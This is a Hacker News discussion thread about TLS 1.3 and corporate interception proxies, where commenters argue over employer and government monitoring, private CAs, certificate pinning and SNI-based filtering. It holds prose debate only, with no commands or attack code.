Hacker News new | comments | show | ask | jobs | submit login
TLS 1.3 and Proxies (imperialviolet.org)
304 points by wglb 9 months ago | hide | past | web | favorite | 144 comments



I just read the discussion and I see that people are conflating a few things and having an emotional response. There is a difference between different types of network operators, and whether they have any business snooping on your traffic.

There is a difference between an unauthorized party intercepting TLS communication, and a party you have authorized to do so.

Let's say I am a private person and am trying to access my bank account through a TLS connection. I am connected via WiFi to my cafe. I have not authorized the cafe, its uplink provider, nor any of the other network operators between me and the bank to intercept my traffic. It should be impossible to do so.

Let's say I am employee of a financial institution. This company, in order to adhere with record-keeping laws, needs to log all network connections. One of the conditions of my employment is that I authorize the company to intercept my network communications. The proxies within my company should be able to intercept my communications. However, no network operator outside of the company for which I work for and to which I have given consent to intercept my traffic, should be able to intercept the communications.

The real world presents situations that are more nuanced than "encrypt everything and don't let anyone between me and the destination to see what is going on." There are many places where the above is the desired and sensible requirement. There are also many use cases where crypto is warranted, but select parties should have the ability to break it.

How this should happen is to be seen. In the examples I have given above, "consent" will have to come both in the idea of consent, as well as some crypto key that will allow the privileged proxies to intercept my traffic.


Note that nothing about TLS 1.3 prevents a Proxy whose CA certificate is installed by the user from MitMing a TLS 1.3 session. This is also why certificate pins are ignored when a cert is signed by a manually installed certificate.

What TLS 1.3 does appear to do is make it harder to optimize this proxying, and make it impossible to be selective about what you proxy. However, both such optimizations and selective proxying are apparently hard to implement securely. Now, selective proxying is nice to have. It is better if enterprises don't intercept traffic to banks or social networks. However, it seems to me like facebook would be a nice side-channel for exfiltrating data.

It seems to me that selective proxying could still be solved at the DNS level. Make any domain except for the whitelisted ones resolve to a proxy, and the have the proxy in between all traffic. This means you also proxy all unencrypted traffic to the outside world, but if you are proxying TLS, you probably want to block or proxy plaintext outbound connections as well.


> What TLS 1.3 does appear to do is make it harder to optimize this proxying, and make it impossible to be selective about what you proxy.

You have the ServerNameIndication (SNI) in the ClientHello, so selective proxying is very easy to implement with TLS 1.3. SNI wasn't mandatory in older versions, which is why middleboxes went for this "let's inspect the certificate" dance in the first place.


To do TLS proxying properly, you need to verify the cert on 'trusted' domains. SNI is not verified.

Thus, a proxy using SNI to identify the host would be circumvented by using facebook.com or www.bankofamerica.com as the name in SNI and just ignoring SNI at the malicious endpoint.

As TLS 1.3 encrypts the certificate, you can't check the certificate without actually MitMing the connection. Thus, whitelisting isn't possible in TLS 1.3. Unless you trust the (attacker controlled) SNI, at which point, why even do TLS proxying.

Note that according to the article, many TLS 1.2 proxies don't actually verify the certificate by default, which means my masquerade as facebook.com ploy would also work against them. This can be done by simply using a false 'common name' field in the cert. The defense against this is easy, it is the certificate validation all browsers do. Apparently, these middle boxes by default do not use this validation.

This is generally seen as a compelling argument against the deployment of TLS proxies. The argument being that they are 'security theater' as opposed to actual security, on account of them being easy to spoof.


There is a strong argument that in the financial-institution case you should be just blocking web-bound TLS traffic, instead of lobbying internet standards to break TLS. The applications that want to route their traffic through inspection proxies can then do so explicitly.


> There is a strong argument that in the financial-institution case you should be just blocking web-bound TLS traffic

There is a simpler solution to let users still access the Web: let them do so unencrypted. They won't have the "Secure" symbol on their browser, which is extremely reasonable considering that, indeed, their access is not really secure: their employer can read all communications.

The employer simply sets up a proxy that receives unencrypted communications and encrypts them on the fly; a TLS/HTTP client.


I think that would probably break a lot of web apps, which will use URLs with "https://" in them. Also e.g. HTTP2 doesn't work without TLS (the spec technically allows, but no major browser actually does).


The proxy would redirect HTTPS requests to HTTP, and use HTTP 1.1 between the client and the proxy.

The bigger issue is HSTS; the proxy can remove the header, but if the origin comes preloaded in the browser, that won't do, which means the browser would need to be customized to not have or enforce HSTS.


I guess that would be possible, although HTTP2 has some extra features like Server Push, which might be hard to "backport" cleanly.


One of the issues is that, due to poorly constructed legislation or private contracts, there is may be a requirement to provide "industry-standard" protection to various network connections. TLS 1.3 will, in due time, be the industry standard.

This needs to be reconciled with the conflicting requirement to log, record, and or block connections based on content.

Perhaps TLS 1.3 is not the solution here, as it can not reconcile this conflict. Perhaps something else needs to be developed that will provide a solution that meets these two requirements.


Where I work, the company has a TLS 1.2 proxy as discussed in the article. The stated purpose is to intercept malware. It frequently fails, as the fine article states, and people then either use their personal phone and 4G to wifi, or proxy traffic over ssh to a server they have at home. I can't imagine it's anything but "something must be done, we're doing something."

Furthermore, as most large companies install these, won't malware authors just start proxying C&C traffic over ssh on port 80? Or use other non-interceptable secure channels?


Could you cite the exact statute that requires logging mere connections?

I thought most of these compliance frameworks don't really specify how, just compile, archive and produce the data periodically (or on demand). And make the system tamper-proof (or tamper-evident), and get it audited from time to time.


I am not aware of legislation, but there are many industries where there are compliance requirements that require monitoring, for example financial institutions, possibly FISMA.


> This needs to be reconciled with the conflicting requirement to log, record, and or block connections based on content.

If there is something to reconcile, the bug is in the law and should be fixed there.


Then you'll have no web bound traffic. It'll all soon be encrypted anyways, forced MITM attacks or not. And client boxes will continue to require investment in order to de-secure them. The corporate world can transition to being fundamentally insecure while the rest of the world will secure its traffic.


In some countries, there are "secret laws" (not the USA), where government body that controls ISP license and legalese issues can force ISPs to keep logs, not just metadata, of individual user browsing and share it with law enforcement official - whenever asked without any form of a court order and legal paper. We already have to share the 'User Form' the users sign up when getting internet connections, which has all kinds of personal information including pictures, address, phone number and national ID number.

Failure to do so will get you heavily fined and get your license revoked to do business. Also, you can't talk about it to the public.

I have friends and family in at least three countries who are involved in this industry and have confirmed me that this is a routine process, log sharing, port-mirroring, putting black-boxes in the middle of your core network is just routine work and has been the case for many years.


I think that in such situations where a citizen of said country is not granting the operator the right to snoop, TLS 1.3 and it's inability to snoop accomplish the goal perfectly.

Perhaps such countries will outlaw TLS 1.3. Who knows. The US did outlaw strong encryption at one point because it didn't allow it access to data it wanted to have access to.


To your second point, that’s not exactly what happened. 128-bit encryption wasn’t outlawed, it was just illegal to export (the more useless 40-bit encryption was fine). There were various ways of working around this export ban before 2000 when it was rescinded (for most countries).

https://en.wikipedia.org/wiki/Export_of_cryptography_from_th...


I was going to guess one of these countries is China, but they don't really have secret laws; they monitoring everything out with mandates that are out in the open.


The parent was probably referring to laws pertaining to secrets, not laws that themselves are secret.


> This company, in order to adhere with record-keeping laws, needs to log all network connections. One of the conditions of my employment is that I authorize the company to intercept my network communications

Does that mean they also need to intercept communications from your phone to the internet when you're at work?


Generally no, because your phone is not allowed to have access to business records.


what about the camera of your phone?


> Let's say I am employee of a financial institution

So one institution has law requirements that break users' rights so we must change the internet for them


Just because someone sits behind a computer doesn't mean they get to have complete control over and privacy within that computer. Specifically, when they do not own that computer and are payed by someone else to do work using that computer.

In this sense, corporate users truly are different from private users. Similarly, company e-mail is not confidential. A very important requirement to this treatment of corporate users is that the end user ought to be made aware of this. Both with the company e-mail and the proxied company computer.

Part of the issue here is that sometimes encryption is bad. I for one dread the day I'll have to install some binary blob that communicates using TLS with a pinned cert I cannot override. Similarly, encryption and secure hardware modules are what enable boot-locked devices. The point being, cryptography can be used to take away control. Not just from big institutions but also from end users.

If we admit that sometimes cryptography is bad, there might be cases where we want a controlled way to break it. Again, this should be done with notice and all responsibilities lying with those taking the risk. That is, the party responsible for securing the proxy is also the party that is screwed when the proxy is compromised.

This might sound like encouraging key-escrow for government acces. It definitely does not. The issue there is notice (or choice, if non-escrow becomes outlawed) and the fact that a compromised system hurts end users, not the government. Thus, the incentives are misaligned for the government.


> If we admit that sometimes cryptography is bad

I'm not sure I follow, so because HSTS is a disaster then encryption is bad and we should switch to no encryption?


No, the point is simply that sometimes encryption has bad results. The example being an application that talks to its home server over an encrypted connection which cannot be audited.

Then, I propose we should also take issue with encryption that prevents TLS proxying in corporate settings.


> The real world presents situations that are more nuanced than "encrypt everything and don't let anyone between me and the destination to see what is going on." There are many places where the above is the desired and sensible requirement. There are also many use cases where crypto is warranted, but select parties should have the ability to break it.

In these institutions just block TLS 1.3 connections in the firewall. Where is the problem?


the reason TLS1.3 has been delayed so long is vendors and researchers that believe the dual-speek that TLS needs to be both secure, as well as readily interceptable (and therefore insecure) in order for it to be "ready" to use.

TLS and encryption arent going anywhere and theyre not always going to wait around for a concensus from industry. The sobering truth is that if not now, than in a decade or so the companies shilling TLS/SSL interception appliances and software will need to shift focus as the protocol will likely have been evolved by force over time to meet the needs of increasingly prevalent surveillance states. TLS interception or "proxying" started out as a graduate students parlour trick and eventually evolved into an entire shady industry where players like Bluecoat are routinely caught selling their products and services to repressive regimes.

Heres hoping LibreSSL delivers the goods with or without the marketing teams say.


I should absolutely be able to intercept TLS traffic on my computers on my network. That's the distinction. Third party interception capability needs to be illegal and connections should be tamper evident.

Frankly, I have a higher duty than user privacy. My users have access to data that's critically sensitive in various ways, in some cases they face criminal sanction. I need to both control and detect unauthorized software on the network and ensure that users are following the rules.

More extreme privacy activists will make noises about things using endpoint based solutions or something similar. It's a bullshit position that will ultimately weaken security.


The largest ISP in Kazakhstan believes that it should be able to intercept all TLS traffic on their network: https://bits.blogs.nytimes.com/2015/12/03/kazakhstan-moves-t.... Because there are no technical differences between your TLS interception and what Kazakhtelecom is doing and no legal differences in most non-Western countries, I believe that all software should be changed to make TLS interception as hard as possible.


There is absolutely a significant legal and moral difference between national interceptions like Kazakhstan does and the ones we do protecting children you are guardians of or protecting company secrets and integrity.

In the latter case ideally (and possibly legally required) you'd have acceptance of potential interception a condition of employment.


That isn't a technical problem, it's a Kazakstan problem.


On your computers, yes. On your network, not so much. You have no right to intercept data just because you are moving it from one side to the other.

And that's the thing. There is nothing stopping those companies from analyzing the data once it reached a managed computer. It is just that they want the capacity to do that on computers they don't manage.


Yeah, no. The network is my property and the contract our employees or partners sign establishes terms for using the network.

You cannot get out of the network unless the traffic is proxied. There are a few exceptions for identify based reverse proxies that companies like Google talk about. But most places aren't there yet for sensitive applications outside of collaboration.

There's also the matter of trust. Some business partners are explicitly trusted, either by a private CA signed certificate or by a specific third party key that is independently validated.

Public networks are completely different. I am not talking about an ISP here.


What your saying doesn't really address the issue marcosdumay raised: That is, the issue with allowing this kind of introspection is its susceptibility for abuse.

That said, your use-case of intercepting secure connections in your private network is a solved one: set up a private CA.

Wanting to weaken the security of TLS for everyone else for what amounts to your own convenience is very selfish.


Is setting up a private CA even enough with certificate pinning?


You should have a private CA setup if you're doing TLS inspection, I have one at home deployed through group policy/apple configurator profile to filter web traffic on any system my daughter is logged into (she's five and plays games on pbskids.org and such, need to make sure she can't even accidentally get at inappropriate content if I step away for a couple minutes to get lunch prepared or something).

Unfortunately (?) some companies are actively working against IT administrators (and in my case, parents) ability to inspect TLS traffic on their networks - Google being a big one with the recent release of Android Nougat requiring apps to opt-in to allowing user/admin installed CA's to be honored. User privacy is important, but if you're using a company-issued phone or allow their MDM to deploy a CA to the trust store on your own phone you should know what you are signing up for. Google Chrome pins the certificates for google-owned sites as well, so even if your private CA is installed in the system trust store it will flat out refuse to load google.com, etc.


Come on man, be reasonable! If someone's boss saw that you were able to set this up for one user, in your spare time, that boss might think someone should just network-admin up and do the same for their organization. You know, rather than trying to break standards so they don't have to update the shitboxes they were silly enough to buy...


Oh gosh, network admins might actually have to learn how to do their job, or, more likely, managers might have to learn how to listen to them? The horror!


Re kids, might it be easier to whitelist sites instead?


Makes it harder for my wife to introduce her to new things, if I used a whitelist she would have to pester me any time she wants to get her onto a new site and then there’s the PITA of dealing with CDN’s and other third party sources that can change on a whim.

Whitelist would be safer, but it’s not worth the headache - we use blacklisting to try and prevent accidents for brief periods when we can’t supervise her access instead of falsely thinking it eliminates the need for supervision entirely.

Regardless, still need TLS inspection either way - even pbskids.org is served over HTTPS these days.


Could you make a whitelist that, when faced with a site not on the whitelist, serves up a webpage that asks for the parent to enter a passphrase to add this site to the whitelist?

Sounds like it could be a worthy venture. Make this software running on dd-wrt or whatever, then sell people wifi-routers with this preloaded so that they can just plug it to their existing routers with ethernet, and voila they have a kid-friendly separate wifi.


> Could you make a whitelist that, when faced with a site not on the whitelist, serves up a webpage that asks for the parent to enter a passphrase to add this site to the whitelist?

I could, but it's a lot more work than just installing Sophos XG on a used server and enabling filtering for certain users. I could also show my wife how to use the admin interface and add additional sites to the whitelist, but there's still the issue of CDN's and such that make life difficult.

> Sounds like it could be a worthy venture. Make this software running on dd-wrt or whatever, then sell people wifi-routers with this preloaded so that they can just plug it to their existing routers with ethernet, and voila they have a kid-friendly separate wifi.

Some companies already sell content filtering devices that sit somewhere on your home network, I'm not a fan of them because they usually require you install some client on your devices or use a captive portal for authentication. Some also have a monthly/annual subscription or those that don't I worry how they even afford to keep the list up to date once they get out of growth stage (or I'm out $$$ for the hardware if they fail to exit it at all).

I realize my setup at home isn't for your average user, but one huge advantage I have that nets it a high Wife/Spouse Acceptance Factor is authentication to my firewall is done through RADIUS accounting packets and I already have AD deployed at home. The moment you login to my network the wireless access point or switch (if wired connection) tells the firewall what user is assigned to a specific IP address, so my wife just signs in with her AD credentials on her iPhone/surface pro/etc. and the firewall already knows to let all her traffic through, if my daughter signs in on her computer/iPhone (she has my old 6+ to play games on) traffic is immediately filtered.


Your setup sounds really interesting! Do you have a writeup somewhere?

Also, do you know of any way to filter YouTube (other than outright blocking it)? E.g. only allowing content from a whitelist of channels? YouTube Kids isn't really effective, unfortunately.


The HTTP Public Key Pinning specification says that browsers should/may (I forget which) ignore the pin if the chain ends up at a private locally-installed CA, for this very reason.


It's also worth mentioning that an MITM proxy with a private CA root certificate could just strip HPKP headers out of any webpage it sends you. If your computer is tied to its network (e.g. corporate PC) it will never see it, so there's no issue.


I'm confused, isn't this the normal criterion for a certificate being valid? If your certificate chain doesn't end in a locally-installed trusted CA then how is that any different from a random cert signed by a nobody off the street?


As tscs37 explained, there's a difference between the CAs that came with your OS/browser by default, and ones you have installed. Pins are usually ignored if the chain ends at the latter, because that's exactly the sort of scenario that would be used for corporate TLS MITM.


There is a difference between a local CA and a CA part of the root store and/or as part of the system's CA bundle.


So terminating in a root CA imposes more restrictions than terminating in a non-root CA here? Something about that seems off...


Not root CA. Root store.

A root CA that has been installed by the computer administrator is assumed to be more trustworthy than the one installed by your OS.


This feels like it comes down to values more than security. Bottom line is you are intercepting my traffic as an employee.

I've worked in these places and I won't work for them. It places trust in my employer and other employees (most of which I will never meet) that I'm not willing to give. Sure you can tell me that certain sites aren't intercepted, and I can tell that from the origin of a certificate, but many employees can't and don't understand any of this.

If your data is really so secure setup an airgap. There are other ways to securing a corporate network that don't involve a 'just in case' dragnet.


> It places trust in my employer and other employees (most of which I will never meet) that I'm not willing to give.

Ditto, but my solution is to just not login into any important/private/nonpublic stuff on employer networks. There's plenty of other non-proxy stuff an employer can install that I also don't trust, and won't necessarily detect, that this seems like a good general policy - irrespective of my employer/coworkers. And if I'm going to be taking that "assume I have no privacy" security stance anyways... them being up front about one of the technologies they're using to secure stuff is, if anything, a good sign.

I've got a non-MITMed cellular connection on my own hardware in my pocket if I'm really hard up for a private connection. I do draw a line at the point where anyone wants to install anything on my own devices. I've temporarily allowed it exactly once - with the device not leaving my sight, and with it being reformatted by myself both before joining it to the work network, and then again before joining it to my home network (although given the potential for firmware malware / IME type stuff, perhaps that's still not cautious enough.)

> If your data is really so secure setup an airgap.

Been there. And I'm paranoid enough to be half tempted to set one up at home. They're a PITA for some workflows though - e.g. needing to play a game of telephone for SDK updates. And then you still can't browse Facebook or whatever with your corporate network. Intercepting traffic instead of completely blocking it is a convenience/security tradeoff.

> but many employees can't and don't understand any of this.

This is admittedly a problem. And they still won't even when the IT department says "we've basically installed our own malware onto 'your' computers / our network, maybe don't log into your bank account from work, we're already going to be feeling terrible and losing sleep if/when our security appliance gets pwned."

So maybe it'd be a good idea ethically and exposure-wise to block facebook/google services/banks if you're going to MITM despite potentially pissing off those who are fine with trusting their employers/coworkers. But I'm relatively OK with a well communicated and disclosed TLS proxy for work networks.


> Yeah, no. The network is my property and the contract our employees or partners sign establishes terms for using the network.

And on that basis, you're prepared to throw such a tantrum as to hold up completion and adoption of a crucial cornerstone of protection for people who actually need privacy?


So you're ok with a compromised printer leaking your medical records? Or notes used by a police investigator while researching a unsubstantiated or even false accusation leaking thanks to some drive by malware?

Interception of web traffic stops those threats.

Nobody is throwing a tantrum or compromising a cornerstone of security. You don't really understand the full scope of what you are talking about -- the "cornerstone of privacy" you speak of is really placing ultimately trust in every random web service.

TLS and the root trust problems associated with it are bad enough. Preventing users from making choices about who and what they trust makes those problems dramatically worse.


> So you're ok with a compromised printer leaking your medical records?

No, but you stop that by refusing to let the printer talk out of your network at all.

> Or notes used by a police investigator while researching a unsubstantiated or even false accusation leaking thanks to some drive by malware?

That's where on-host monitoring can protect you. It'll also protect you in case that computer can ever connect to any other network.


>No, but you stop that by refusing to let the printer talk out of your network at all.

That's a lost battle, honestly. If you block traffic from the printer to the internet, it starts sending UDP with faked source addresses.

If you deploy a VLAN the printer can fake the VLAN Tags. If you physically seperate the printer from any direct connection to your firewall, the printer can look for anything on the network it can use to bounce traffic from (like a DNS server or a computer accepting ICMP echo requests)

A sufficiently dedicated attacker can and will extract information through covert channels.


Yeah, I mean it really depends on the brass tacks here.

Whatever happens with TLS1.3, obviously the looming idiocy of the CA system is a larger problem. And yes, you're right, trusting random web services (ie, the other endpoint) is often a mistake.

But at the end of the day, the users that need to be served by TLS are the endpoints, not the proxy operators.

(FWIW, I suspect that TLS as we know it will shift fairly radically anyway as distributed applications become more prominent).


All you have to do is block all TLS on your network and you're good to go.


Do you really think a silly proxy will deter an evil employee from getting data off your computers? There are a miriad of other ways to extract data: usb stick, WiFi hotspot from your 4G phone, bring the whole laptop home or simply obfuscate/encrypt the data and tunnel it over something that looks legit.

Do you ever go through your proxy logs and when was the last time you actually found something suspicious?


Epoxying the USB ports and locking in the network connection settings with Group Policy are par for the course in the kind of organization that would implement TLS interception.


Nope, they don't. Most organizations I call the 'casual creeps'. They buy some badly made security appliance or software suite, install the certificate through some active directory policy and call it a day as their IT staff snigger behind the scenes at whatever their employees are doing. If they made their creepy behavior more public, they will rightfully so start getting higher employee turn over.

Even very sophisticated large tech companies don't epoxy their USB ports on their employee macbooks.

// EDIT: They also cover their asses with some 'network use policy' that is the vaguest possible thing and which even most software engineers don't understand the full extent of what is done. It's pretty disgusting, and I can't wait until some combination of GDPR style informed consent and what is law in austria[1] is put into employment law.

[1] https://www.taylorwessing.com/globaldatahub/article_austria_...


Yeah how could they sell their used laptops when they upgrade, if there were epoxy in the ports? I've never heard of any named non-military organization doing that. You're totally right about the network creepers, too. They're easy to spot: just point out some of the problems with proxy shitboxes or the ridiculous EULAs that come with them and see who gets pissed off.


So true, I've worked in tons of places with proxies but zero with epoxied usb ports or locked down network configuration. The only thing these proxies ever achieved was lower productivity due to hours of configuring custom software or not being able to browse useful information on legit sites like stackoverflow. It's just a play from IT so they can add a tickbox saying their network is secure when in fact it's a big fat joke as these proxies usually act on a blacklist basis and not whitelist.


> You cannot get out of the network unless the traffic is proxied

Place I work does this - and it's a constant PITA that gets in the way of me doing my job. But I think if you have a system to put exceptions in place, and it doesn't take 47 weeks of email ping ping with 18 different managers, then it's fine.

Unfortunately, where I work is a beurocratic nightmare.

But it's easily gotten around - I have a cloud-hosted VM (paid for by company MSDN!) that runs SSH on port 443 - so the HTTP proxy will let me through to setup a tunnel through which I can access anything using SOCKS.


This seems like such an old fashioned way of thinking. Internet access is increasingly a fundamental human right and is needed to interact with most government services in first world countries.

I think assuming you can control any packets that pass through a network ends up being a losing proposition. Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled? Failing that, install software on users computers and don’t allow them to use any non-work internet resources.


>Internet access is increasingly a fundamental human right and is needed to interact with most government services in first world countries.

That's all well and good, but you don't need to do it from your desk at a regulated financial institution.

>I think assuming you can control any packets that pass through a network ends up being a losing proposition.

This is a very strange statement. All security is always a losing proposition. The best anyone can ever hope for is raising the bar of cost and sophistication an attacker will have to surmount to be successful, but you're still very much obligated (legally, and ethically) to do that. If you possess sensitive data, you need to take steps to detect and prevent exfiltration. If you have employees (such as registered broker-dealers) whose conversations with the outside must be monitored and retained under the law, you need to make sure they're using only the properly configured communication channels.

>Why not use things like VPNs to ensure that traffic to sensitive internal services is controlled

Because TLS interception is about preventing unwanted egress/exfiltration from the (relatively) trusted zone of a corporate network.

>Failing that, install software on users computers and don’t allow them to use any non-work internet resources.

Installing the corporate CA on managed endpoints is a prerequisite for TLS interception. The problem VPNs solve has nothing to do with this.


TLS interception is predicated on whitelisting your own CA on the endpoint. Can't really do that if you don't manage it. And in any case, you need to be resilient to a rogue or compromised device.


> I should absolutely be able to intercept TLS traffic on my computers on my network.

Just ask the users of your network to install your CA cert (or click past your cert warnings). That should work with TLS 1.3 right?

Or in your statement are you really meaning, "I should absolutely be able to intercept TLS traffic on my computers on my network without them knowing about it"? If so, that's a completely different thing altogether and if that's what you and the GCHQ mean when talking about proxying, it needs to be explicitly stated. There is a huge difference.


> I should absolutely be able to intercept TLS traffic on my computers on my network. ... / Frankly, I have a higher duty than user privacy. My users have access to data that's critically sensitive in various ways, in some cases they face criminal sanction. I need to both control and detect unauthorized software on the network and ensure that users are following the rules.

Perhaps the security agencies view their country as "my network", and then if you read the rest of the quote, everything follows from there.

There are big differences: The compulsive power of government, and the necessity of civil rights and peacefully organizing against the government; compared with the 'at will' relationship with a company and its interest, generally considered legitimate, in ultimate authority and stopping insubordination.

On the other hand, large companies are not really 'at will'; people can't just walk away from jobs 'at will', especially when they have children, mortgages, other debts, or (in the U.S.) health problems. Also, some insubordination is legitimate: Labor organizing, legal and regulatory complaints (EEOC, safety, etc.), and probably other things I'm not thinking of.

The distinction isn't so clear cut. I'm not sure the objection of the corporate sysadmin is that much more valid than the government security agency. Also, the security agency often has far more at stake.


TLS 1.3 doesn't change that, you can still MITM connections using your own root CA certificate installed on users' devices. Not quite sure what you're arguing against here.


You're saying with a straight face that you want to have encryption containing a backdoor. How is your demand different from the FBI's and its ilk?

Intercept the traffic on your machines, if that's a legal requirement.


Let's say a user has to access something confidential over your network to an outside resource that has to follow HIPAA guidelines.

Intercepting that data would be an HIPAA violation, how do you avoid that?


Do you have a citation for this? I do security reviews for companies with strong HIPAA requirements and I’m nearly certain this is incorrect.


We properly presume your network to be hostile and malicious to security. You've declared it so. Therefor everything is encrypted and secured. Your hostile network is no different than a hostile network of a small country bent on attacking the security of the communication.

So feel free to have insecure communication provided you control all devices on the network. It will still be insecure.


To be clear, TLS 1.3 has no (or negative) support for interception. The delays are due to adding hacks to cleanly prevent interception, not to add it.


I don't understand your reference to LibreSSL in the context of your comment—why would they be different from any of the other SSL implementations? Are they planning on implementing something else besides TLSv1.3 per spec, or intentionally implementing more or less than the spec requires?


I agree with regards to appliances like Bluecoat, but is TLS as a black box to keep users from seeing what the device is sending over the wire better?


This needs to be highlighted more often. TLS interception can be a very effective tool to expose insecure APIs and blatant privacy violations. It's ultimately a tradeoff between security (no bad interception) and privacy (no idea what my device is sending).


TLS doesn't prevent you from intercepting your end of the connection on a device you control. If you don't control your own device then the problem is with your device, not TLS. We shouldn't weaken TLS just because you chose to hand control of your device to someone else.


Well I agree. My main concern is that we're loosing that control in the name of security, in particular on mobile devices. Take Android as an example, which doesn't respect user-added CAs anymore for application traffic [1]. It's even worse with cert-pinned iOS apps where you cannot root easily, although Apple is at least trying to fix this with App Transport Security (which does respect user-added CAs).

I definitely do not want to see a weaker TLS - 1.3 is great. At the same time, I do not want to have 'security improvements' that make it impossible for average developers to see their own device's traffic. That will ultimately enable insecure APIs and gross privacy violations behind TLS.

[1] https://github.com/mitmproxy/mitmproxy/issues/2054


> My main concern is that we're loosing [sic] that control in the name of security

If you've lost that control you have nobody to blame but yourself. There are devices and operating systems on the market that do not require you to give up that control. If you choose to buy a device you can't root and an OS you can't modify, that's all on you.


> ...and privacy (no idea what my device is sending).

This is where Libre/Open Source software comes in and why it plays a vital role in creating an ethical connection between people and softwares. There is literally no other way around this. Open code, secure transmission, harsh accountability on violations.


Open source is great, but using source code is an awful way to figure out what something is transmitting, compared to actually looking at what it transmits.


Lets be pragmatic here though - it's not reasonable to expect all software to be open source, nor is it reasonable to expect that only people who run a fully FOSS stack be able to inspect network traffic on their computer.


By definition the insistence that it should be possible to do something that's actually impossible is not pragmatism.

If you don't actually control the box, it can do whatever it pleases. It doesn't need an IETF Standards Track RFC, it can just choose to do it and you can't stop it.


I agree, I'm continually saddened by the zealotry of the anti-surveillance lobby and the seeming dismissal of the privacy focused hacker who wants to know when exactly does Uber send data, and what exactly do they send.

Especially when it goes as far as encoding the philosophy that state actors are the only problem that matters into the very protocol.


Could you explain how TLS 1.3 in any way reduces your ability to intercept traffic on your own devices?


TLS 1.3 still enables exactly that.


>the protocol will likely have been evolved by force over time to meet the needs of increasingly prevalent surveillance states.

Are you saying the protocol will be easier or harder to intercept in the future?


Wow, the linked GCHQ piece is impressive: The title is that TLS 1.3 is "harder for enterprises" because "Many enterprises have security appliances that seek to look into TLS connections to make sure that the enterprise security is appropriately protected." And, later: "It certainly looks like it’ll have a negative effect on enterprise security."

Open lobbying against crypto from the spooks, in the name of collective security, is of course not a new thing - but dressing it as necessary for "enterprise security" in standards lobbying is a clever move.


To be fair to the original author, NCSC is no longer part of GCHQ.


There is a prominent "a part of GCHQ" banner at the top.


Wow, that’s the biggest facepalm I’ve done recently. I was under the impression that they were officially split but apparently not. They’ve definitely now got seperate office blocks, and more of an operational split than the previous CESG ever had at least.


Having worked in locked down networks before, I get the idea of securing resources and keeping secure data inside the network.

But what bothers me, is I keep asking myself the question: When and why did we decide to give the proxy all the power in this relationship?

If we have to use proxies, at least the proxy should be transparent about itself to all parties on the connection. Then my bank can drop the connection or restrict functions/data to non-proxied data, secure government servers can drop the connection, my browser can drop the connection and give me an error (because I don't want anyone snooping on my banking history), etc.

Eg. Let's say I open the patient portal for my hospital through a proxy. Is the proxy software HIPAA compliant? What about the people that have access to my health data through the proxy software? In this case, I would think we should allow the portal software to drop the connection because the connection itself is not secure.


> In this case, I would think we should allow the portal software to drop the connection because the connection itself is not secure.

It sounds like what you want is the server authenticating the client. That already exists in TLS: it's called a client certificate (complementing the usual server certificate, which authenticates the server to the client).

Unless the MITM proxy has access to the client certificate's private key, or the server trusts the MITM proxy's CA, the proxy cannot impersonate the client.


Is any B2C mainstream bank using client certificates? I've not seen it in the wild. I think easier solution is just BYOD to work with 3g/4g SIM, you can pick up a reasonable 8" tablet for $100 that supplements your phone for when you need a bigger screen size.


”Is any B2C mainstream bank using client certificates?”

I doubt it. AFAIK the web browsers’ UI for handling client certificates is way too cumbersome for mainstream usage.


One of the nice things in TLS 1.3 that we might never end up using in anger but is there if we want it is the request from a server for a client certificate now gets to express arbitrary constraints.

In TLS 1.2 you could only express a list of CAs whose signatures you trust (this is one of the most widely misconfigured settings in OpenSSL-based software, telling OpenSSL you _trust_ some CA to identify clients when actually you meant to say your server certificate is _signed_ by that CA)

In TLS 1.3 you can write out arbitrary constraints, although somebody will need to define any new ones in a separate ID or RFC. So this might simplify the end user experience down the road because the browser can do enough matching to just hand over the correct certificate automatically.

Or it might never get used on the public Internet, oh well.


The point I was really making was one about transparency. Many people don't know their connection is insecure. They see the green link status on chrome and everything is good.

If the server detects an insecure connection, then at least the minimum is that the user is informed.


I'll reiterate what I said before. I'm for TLSv1.3 breaking middleboxes.

It's more important to have good viable security rather than "my middleboxes". To me, it's like the FBI asking for NOBUS crypto.


The side effect of this is that corporate networks will become draconian in what services can be accessed from their networks. Expect everything outside of 10./8 to be black holed; No internet access of any kind. The company's legal requirement to prevent data exfiltration trumps your ability browse reddit during your lunch break. Plus, if they can't monitor the connection, they will monitor the endpoint.


The reality is that corporations always exist under a tension between an inclination to forbid everything, for fear it will cost the company money or reputation, and a need to allow everything so that people can get their jobs done or are willing to work there.

The Internet is nothing special in this respect, large companies struggle to make policies that cover all the bases without strangling themselves and they will err on both sides of the line, sometimes learning from their mistakes and sometimes not so much.


If only everyone with a job and most people without one had some kind of personal network device, compact enough to be kept in a pocket or purse yet powerful enough to "browse reddit"...

Lots of corporate networks probably should be locked down to that extent. If they can't set up their own CA they're probably not doing a great job protecting their customers' private information.


I don't get your comment. They should monitor the endpoint, of course. I guess it has to be legal (in some Countries it is not) and written in your work contract.

How do you think Google found out Levandowski was stealing blueprints? Definitely not by meddling between TLS endpoints.


I doubt this, but if it happened, would there be any downside? Your lunch break browsing deserves privacy too and you should do it on your own device (or own hotspot at the very least).


Most places already monitor the endpoint already.


A regular (non-transparent) HTTP proxy like Squid will process HTTP requests internally, but clients use CONNECT to forward their raw connection to the remote site for HTTPS. This is good: it means the client establishes a TLS connection with the origin.

It would be really helpful, though, if there were an operating mode wherein one could instruct the proxy to talk to an HTTPS server without using CONNECT. So the browser talks to the proxy over TLS, and displays the proxy's certificate details, possibly with a big red warning, and the proxy terminates that TLS connection, decides what to do based on the request, makes a new onwards connection and gets the response plaintext too.

The user obviously loses some privacy guarantees here, but no more than with an intercepting "transparent" proxy, and it's much clearer what's actually happening and which devices the user needs to trust. I'm much happier with an explicit proxy than any attempts at a transparent proxy that I've encountered, not least because it makes it possible for the browser to be clear to the user about what's happening.


Some religious nuts are preventing me to visit Wikipedia. I use encrypted DNS to protect myself from man in middle attack, and it helps. But then they intercept certificate's name and drop the connection. So, thus this mean that TLS 1.3 will prevent sniffing certificate's name? And there won't be any certificate fingerprint on the wire to be sniffed, right?


Under TLS 1.3 the Server Name Indication extension becomes mandatory, so your client will automatically, in plain text, transmit the full DNS name of whatever server it wants to talk to

[SNI is there to make "virtual hosting" possible for HTTPS, which is why you can get working SSL on a cheap bulk host without paying them extra for a dedicated IP address]

So, a middlebox might choose to drop connections based on the name your client sends (and of course it could also choose to drop them based on the destination IP address, the amount of traffic you've sent recently, or the phase of the moon). But the certificate itself is now always encrypted, so the middlebox can't snoop that without acting as a proxy.

